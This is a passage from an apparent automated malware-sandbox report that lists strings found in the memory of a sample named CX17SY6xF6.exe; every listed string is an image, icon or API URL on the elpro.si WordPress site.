                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/ICO-75-Temperatura.svg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/ICO-75-Tlak.svg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/ICO-75-Vlaga.svg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/LOGO-Header.svg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/03/ELPRO-www-00-HOME-Header-01.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/03/ELPRO-www-00-HOME-Header-01.jpg)
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/03/ICO-75-Eksplozivna-okolja.svg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/03/ICO-75-Monitoring.svg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/03/ICO-75-Prenosne-naprave.svg
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/03/preloader.gif)
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-25-of-25-Copy-100x100.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-25-of-25-Copy-150x150.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-25-of-25-Copy-300x300.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-25-of-25-Copy-331x330.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-25-of-25-Copy-600x599.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-25-of-25-Copy-64x64.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-25-of-25-Copy-661x660.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-25-of-25-Copy-768x767.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-25-of-25-Copy.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-5-of-25-Copy-100x100.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-5-of-25-Copy-150x150.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-5-of-25-Copy-300x300.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-5-of-25-Copy-331x330.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-5-of-25-Copy-600x599.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-5-of-25-Copy-64x64.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-5-of-25-Copy-661x660.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-5-of-25-Copy-768x767.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-5-of-25-Copy.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-8-of-25-Copy-100x100.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-8-of-25-Copy-150x150.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-8-of-25-Copy-300x300.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-8-of-25-Copy-331x330.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-8-of-25-Copy-600x599.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-8-of-25-Copy-64x64.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-8-of-25-Copy-661x660.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-8-of-25-Copy-768x767.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-8-of-25-Copy.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/06/Untitled-design-1170x658.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/06/Untitled-design-1536x864.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/06/Untitled-design-355x200.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/06/Untitled-design-585x330.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/06/Untitled-design-600x338.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/06/Untitled-design-64x36.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/06/Untitled-design-768x432.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/06/Untitled-design.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/06/naslovna-slika-sezigalnica-355x200.jpeg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/06/naslovna-slika-sezigalnica-64x36.jpeg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/06/naslovna-slika-sezigalnica.jpeg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/07/PRENOSNA_2220-9670-asfalt_asvalt_moder-100x100.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/07/PRENOSNA_2220-9670-asfalt_asvalt_moder-150x150.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/07/PRENOSNA_2220-9670-asfalt_asvalt_moder-300x300.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/07/Untitled-design-2-355x200.png
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-json/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.elpro.si%2F
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.elpro.si%2F&#038;format=xml
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-json/wp/v2/pages/2
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/xmlrpc.php?rsd
                  Source: CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.888204578.00000000071D5000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.589104954.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 